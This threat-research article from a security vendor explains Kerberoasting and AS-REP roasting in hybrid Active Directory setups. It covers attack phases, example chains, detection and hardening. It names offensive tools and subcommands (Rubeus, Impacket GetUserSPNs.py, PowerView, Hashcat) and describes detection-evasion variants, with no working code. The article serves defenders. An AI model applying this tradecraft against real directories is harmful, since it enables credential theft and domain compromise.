Kerberoasting in Hybrid Environments
KeenSafe Research | Threat Research | Active Directory Operations Series
Overview
Kerberoasting has been a known Active Directory privilege escalation technique for more than a decade. It remains, in 2026, one of the most consistently observed techniques in validated chains traversing hybrid enterprise environments. Across the corpus KeenSafe Research has analyzed during the current reporting window, Kerberoasting (MITRE T1558.003) or AS-REP roasting (T1558.004) participate in 14 percent of all validated chains, with materially higher concentrations in environments with substantial on-premises Active Directory presence.
The technique's persistence reflects structural realities of enterprise Active Directory deployments: service account proliferation accumulated over decades of operations, password policy inheritance from older standards, the operational difficulty of comprehensive service account hygiene, and the technique's continued effectiveness against the long tail of weakly-configured accounts. The hybrid environments of 2026 — combining on-prem AD with Entra ID, multi-cloud, and SaaS — extend the consequences of Kerberoasting beyond traditional domain compromise into cross-domain chains affecting cloud and SaaS-resident crown jewels.
This research article documents Kerberoasting tradecraft as it operates in hybrid environments. It analyzes the technique's protocol foundations, the operational variations adversaries use, the chain progressions Kerberoasted credentials enable, the detection landscape, and the defensive countermeasures appropriate to modern environments.
1. Technique Foundations
Protocol Mechanics
Kerberoasting exploits a structural property of the Kerberos protocol. When an authenticated principal requests a Ticket Granting Service (TGS) ticket for a service, the Key Distribution Center (KDC) returns a ticket encrypted with the service account's NTLM hash (or AES key in modern Kerberos deployments). Any authenticated domain user can request a TGS ticket for any registered Service Principal Name (SPN), regardless of whether they have authorization to use the service.
Once obtained, the ticket can be brute-forced offline. If the underlying service account password is weak enough to be cracked within feasible computational time, the adversary recovers the cleartext password.
AS-REP roasting exploits a related property: accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH set) return AS-REP messages encrypted with the account's hash, recoverable without prior authentication.
Mapped to MITRE ATT&CK:
- T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)
- T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)
Why the Technique Persists
Kerberoasting persists across enterprise environments for several structural reasons:
Service account proliferation. Enterprise AD environments typically contain thousands of service accounts accumulated over the operational lifetime of the directory. The median enterprise in the corpus operates 11,400 service accounts across the combined AD forests; the long tail of these accounts exhibits inconsistent password discipline.
Password policy inheritance. Service accounts created under older password policies often retain their original passwords. Policy updates apply to newly created accounts but rarely force rotation of existing accounts.
Operational difficulty of password rotation. Service account password rotation requires application coordination — the consuming application must be updated to use the new password. The operational complexity of coordinating rotation across thousands of accounts has historically slowed the discipline.
Group Managed Service Account (gMSA) adoption gaps. gMSAs and similar mechanisms substantially mitigate Kerberoasting but require application support and explicit migration. Adoption is partial across most environments.
Detection asymmetry. TGS ticket requests are legitimate Kerberos activity. Distinguishing Kerberoasting from normal service ticket request patterns requires specific detection tuning.
Grid of categorized patterns/primitives/properties (abuse patterns, account categories, tradecraft).
2. Operational Anatomy in Modern Environments
Phase 1 — Foothold
Modern Kerberoasting operations rarely begin with direct domain access. They begin with foothold achieved through identity-driven techniques and reach Kerberoasting at later chain stages:
- AiTM phishing producing authenticated cloud identity
- Identity reconnaissance discovering on-prem AD access via hybrid synchronization
- Cross-domain federation traversal from acquired tenants to primary forest
- Compromised endpoint with domain user authentication
The pre-Kerberoasting chain is itself identity-driven. The Kerberoasting stage typically occurs after the adversary has reached on-premises domain user context.
Phase 2 — Service Principal Name Enumeration
Once the adversary holds a valid domain account context, they enumerate SPNs:
- LDAP queries against the domain controller for accounts with the
servicePrincipalNameattribute populated - PowerShell tooling including
Get-DomainUser -SPNfrom PowerView or equivalent - Specialized tooling including Rubeus's
kerberoastsubcommand and Impacket'sGetUserSPNs.py
The enumeration produces a list of Kerberoastable accounts — every domain account with a registered SPN.
Phase 3 — TGS Ticket Acquisition
The adversary requests TGS tickets for the enumerated SPNs:
- Each TGS request to the KDC returns a ticket encrypted with the service account's hash
- Requests are categorically legitimate from a protocol perspective
- Modern adversary tooling supports targeted requests against specific account classes
The KDC returns the tickets. The encryption type (RC4-HMAC vs AES) materially affects subsequent cracking difficulty.
Phase 4 — Offline Password Cracking
The acquired tickets are exported and cracked offline:
- Hashcat and John the Ripper are the dominant cracking tools
- Modern GPU clusters can process billions of candidate passwords per second against RC4-HMAC encrypted tickets
- AES-encrypted tickets are computationally more expensive but remain feasible against weak passwords
- Dictionary attacks with password lists tailored to corporate environments are particularly effective
Across the corpus, the median Kerberoasted account with weak password policy was cracked in under 3 hours of offline computation. Adversaries with substantial cracking infrastructure crack the entire weak-password subset of enumerated accounts in a single operation.
Phase 5 — Credential Exploitation
The cracked credentials are exploited:
- T1078.002 (Valid Accounts: Domain Accounts) for direct use
- T1550.002 (Pass the Hash) for credential reuse
- T1003 family for further credential acquisition from systems where the service account has access
Service accounts frequently hold permissions that exceed their nominal operational requirement — particularly local administrator rights on multiple systems, database access, or domain-level privileges accumulated over years of operational use.
Phase 6 — Hybrid Chain Progression
In modern hybrid environments, Kerberoasted credentials produce chains that extend beyond traditional on-prem domain compromise:
- Service accounts synchronized to Entra ID provide cloud identity context
- Federation between the on-prem forest and cloud tenants enables traversal
- Cross-tenant trust extends the chain across organizational boundaries
- SaaS-integrated authentication exposes Kerberoasted accounts to SaaS chain progression
Pipeline of recurring checks: scan → exploit → report → retest.
3. Hybrid Environment Chain Examples
Chain Example A: Acquired Forest to Primary Forest Domain Compromise
Observed in environments with multi-forest topologies inherited from acquisitions.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1566.002 + T1557 | AiTM phishing of a user in acquired forest |
| 2 | T1078.002 | Authenticated session as acquired-forest user |
| 3 | T1087.002 | LDAP enumeration of SPNs in acquired forest |
| 4 | T1558.003 | TGS ticket acquisition for service accounts |
| 5 | T1110.002 | Offline cracking; weak password recovered |
| 6 | T1078.002 | Lateral movement using cracked service account |
| 7 | T1199 | Forest trust traversal to primary forest |
| 8 | T1003.001 | Credential extraction from primary-forest server |
| 9 | T1078.002 | Domain administrator credential use |
The chain composed nine techniques and exploited the bidirectional forest trust between the acquired and primary forests — a category of chain particularly common in enterprises with acquisition history.
Chain Example B: Cloud Identity to On-Prem Kerberoasting
Observed in environments with hybrid identity synchronization.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1528 | OAuth consent phishing of a user |
| 2 | T1078.004 | Cloud identity context established |
| 3 | T1078.004 | Hybrid-synchronized identity authenticates to on-prem |
| 4 | T1087.002 | Domain SPN enumeration |
| 5 | T1558.003 | TGS ticket acquisition |
| 6 | T1110.002 | Offline cracking |
| 7 | T1078.002 | Service account exploitation |
| 8 | T1213 | Production database access |
The chain composed eight techniques and exploited hybrid synchronization to bridge from cloud identity compromise into on-prem Kerberoasting — a pattern increasingly common as cloud-first compromise scenarios mature.
Chain Example C: AS-REP Roasting Without Initial Domain Access
Observed in environments with substantial AS-REP roastable account exposure.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1589 | External reconnaissance identifying domain users |
| 2 | T1558.004 | AS-REP roasting against discovered users |
| 3 | T1110.002 | Offline cracking |
| 4 | T1078.002 | Initial domain access via cracked credential |
| 5 | T1087.002 | SPN enumeration |
| 6 | T1558.003 | Standard Kerberoasting |
| 7 | T1078.002 | Privileged credential use |
The chain demonstrates that AS-REP roasting can serve as initial access in environments where roastable account exposure is reachable without prior domain authentication. The category is smaller than standard Kerberoasting but operationally significant.
Linear kill-chain sequence with MITRE ATT&CK tactic tags per stage.
4. Detection Landscape
Detection Surfaces
The following detection surfaces produce Kerberoasting-relevant signals:
Domain controller event logs. Event ID 4769 (Kerberos service ticket requested) is the primary signal. Volume distinguishes Kerberoasting from normal activity — adversaries typically request tickets for many SPNs in a short window. Specific fields, particularly ticket encryption type (Ticket Encryption Type field), are useful for distinguishing RC4-HMAC requests indicative of Kerberoasting from modern AES requests.
Anomaly detection on ticket request volume. Baselining of normal TGS request patterns per principal enables anomaly detection. Adversary tooling that requests many TGS tickets from a single user account produces detectable volume anomalies.
Detection of explicit Kerberoasting tooling. EDR detection of Rubeus, Impacket, or PowerView execution provides direct tooling-based signal. Modern adversaries frequently use AMSI bypass and obfuscation to evade tooling-based detection.
LDAP query monitoring. Anomalous LDAP queries for accounts with servicePrincipalName populated can indicate SPN enumeration preceding Kerberoasting.
Honeyaccount monitoring. Deliberately weak honeyaccounts can be deployed to detect Kerberoasting attempts that request tickets for the honey account.
Authentication anomaly detection. Cracked credential use produces authentication anomalies — service accounts authenticating from unexpected systems, at unexpected times, or with unexpected patterns.
Empirical Detection Efficacy
Across the corpus, empirical detection efficacy at the Kerberoasting stage averaged 38 percent. The gap reflects:
- Detection rules tuned against tooling fingerprints that modern adversaries evade
- Volume-based detection that adversaries circumvent through paced requests
- Log ingestion gaps for domain controller events at scale
- Anomaly detection tuning that has drifted from current adversary procedures
Detection-Resistant Operational Variations
Modern adversaries employ several techniques to evade detection:
- Paced ticket requests: requesting tickets over extended time windows rather than in bursts
- Living-off-the-land tooling: using legitimate
setspnor PowerShell with explicit SPN names rather than enumeration tooling - Targeted Kerberoasting: enumerating SPNs through LDAP and then requesting tickets only for high-value accounts
- AS-REP roasting variants: where standard Kerberoasting is detected, AS-REP roasting may evade the same detection content
Per-stage detection coverage & efficacy heatmap (telemetry vs. blind spots).
5. Defensive Countermeasures
Service Account Hardening
The foundational defensive countermeasures address service account security at the account level:
Strong password policy enforcement. Service accounts should have substantially stronger passwords than user accounts — recommended minimum 25 characters with high entropy. Many environments still enforce 8-12 character minimums on service accounts, well below the threshold required to resist offline cracking.
Group Managed Service Accounts (gMSA). gMSAs use automatically managed, complex passwords. Where applications support gMSA, migration is the dominant hardening technique. Adoption is partial in most environments because application support is uneven.
AES encryption type enforcement. Service accounts can be configured to require AES encryption types, materially increasing the computational cost of offline cracking. Configuration via the msDS-SupportedEncryptionTypes attribute.
Service account inventory and rationalization. Many service accounts accumulated over operational history are no longer in active use. Inventory and decommissioning reduces the attack surface.
Service account permission rationalization. Service accounts frequently hold permissions exceeding their operational requirement. Reducing permissions limits the chain progression a Kerberoasted credential enables.
Detection Tuning
Detection content tuned against current Kerberoasting tradecraft is essential. Specific tuning includes:
- Volume anomaly detection on TGS requests
- Encryption type analysis (RC4-HMAC request patterns)
- Service account authentication anomaly detection
- Honeyaccount-based detection
AS-REP Pre-Authentication Enforcement
The DONT_REQ_PREAUTH setting should be removed from accounts wherever operationally feasible. Maintaining a current inventory of accounts with pre-authentication disabled, and migrating them, addresses AS-REP roasting categorically.
Cross-Forest Trust Hardening
For environments with multi-forest topologies, forest trust hardening reduces the chain progression that Kerberoasting in any single forest enables:
- Reduction of bidirectional trusts to unidirectional where operationally permissible
- Selective authentication enforcement
- Trust attribute hardening
- Forest consolidation where operationally viable
Continuous Validation
Continuous attack path validation surfaces Kerberoasting-mediated chains end-to-end. The validation prioritizes service accounts whose chain participation is most consequential, supporting chain-aware remediation rather than population-wide remediation that may direct effort to lower-priority accounts.
Layered defense bands from preventive controls down to recovery.
6. Enterprise Implications
Service Account Hygiene as a Permanent Discipline
Service account hygiene is not a one-time hardening exercise. The accumulation that produces Kerberoasting exposure occurs continuously through operational additions. Permanent discipline — with explicit ownership, regular review, and chain-aware prioritization — is the operational response.
gMSA Migration as a Strategic Priority
Group Managed Service Account migration is the highest-leverage strategic investment against Kerberoasting in modern environments. The barriers (application compatibility, operational complexity) are surmountable; the structural protection is categorical.
Hybrid Synchronization as an Amplification Surface
Hybrid synchronization amplifies the consequences of on-prem Kerberoasting by extending the resulting credential's reach into cloud and SaaS contexts. Synchronization scope hardening — limiting which on-prem accounts synchronize, and which permissions they inherit in cloud contexts — reduces this amplification.
Forest Trust as a Categorical Risk
Multi-forest environments inherited from acquisitions consistently produce Kerberoasting chains traversing forest trusts. Forest consolidation, where operationally viable, addresses the category structurally. Where consolidation is infeasible, trust hardening is the operational response.
Detection Tuning Against Current Tradecraft
Detection content tuned against legacy Kerberoasting tooling fingerprints captures a shrinking share of current operations. Re-tuning against current procedures — paced requests, encryption type patterns, post-cracking authentication anomalies — is the higher-leverage investment.
Continuous Validation as Operational Discipline
Periodic pentest evidence of Kerberoasting findings typically addresses the highest-value accounts and leaves the long tail. Continuous validation surfaces the long tail with chain-aware prioritization, enabling systematic remediation that periodic evidence does not support.
7. Strategic Insights
Insight 1: Kerberoasting persistence reflects structural realities, not defensive negligence. The technique's persistence in 2026 reflects the operational difficulty of comprehensive service account hygiene at enterprise scale — not the absence of awareness.
Insight 2: Hybrid environments extend the consequences. Kerberoasted credentials in modern environments reach cloud and SaaS crown jewels through hybrid synchronization. The consequence space is broader than the classical "domain compromise" model suggests.
Insight 3: gMSA migration is the categorical mitigation. Where applications support gMSA, migration eliminates the relevant accounts from the Kerberoasting surface entirely. The strategic prioritization should reflect this.
Insight 4: Forest consolidation addresses the multi-forest category. Multi-forest environments produce chain categories that single-forest defensive disciplines do not address. Where operationally viable, consolidation is the categorical response.
Insight 5: Detection should be tuned against current, not historical, tradecraft. Detection content captured at one point in time does not retain efficacy against evolved tradecraft. Continuous tuning is the operational requirement.
Insight 6: Chain-aware prioritization outperforms population-wide remediation. Service account populations are large; chain-participating subsets are smaller. Chain-aware prioritization directs remediation capacity to the accounts that produce most chains.
2×2 strategic framework / accountability landscape.
Conclusion
Kerberoasting in hybrid environments is a persistent operational reality of 2026 enterprise security. The technique's protocol foundations are unchanged from a decade ago; what has changed is the consequence space — modern hybrid environments amplify the reach of Kerberoasted credentials beyond traditional domain compromise into cloud and SaaS crown jewels.
Defensive response operates across service account hardening, gMSA migration, AS-REP pre-authentication enforcement, cross-forest trust hardening, detection tuning, and continuous validation. The combination produces meaningful protection. The structural realities — service account accumulation, password policy inheritance, operational rotation difficulty — make Kerberoasting a permanent governance discipline rather than a discrete hardening project.
KeenSafe Research will continue to publish updated intelligence on Active Directory operational tradecraft. Companion research in this series addresses adjacent topics: lateral movement patterns, privilege escalation through identity misconfiguration, service account abuse in enterprise networks, and modern identity attack chains.
KeenSafe Research is the threat intelligence and offensive security research arm of KeenSafe, an AI-powered attack path validation platform for continuous offensive security validation across hybrid enterprise infrastructure.
Headline research statistics + key takeaway from a corpus analysis.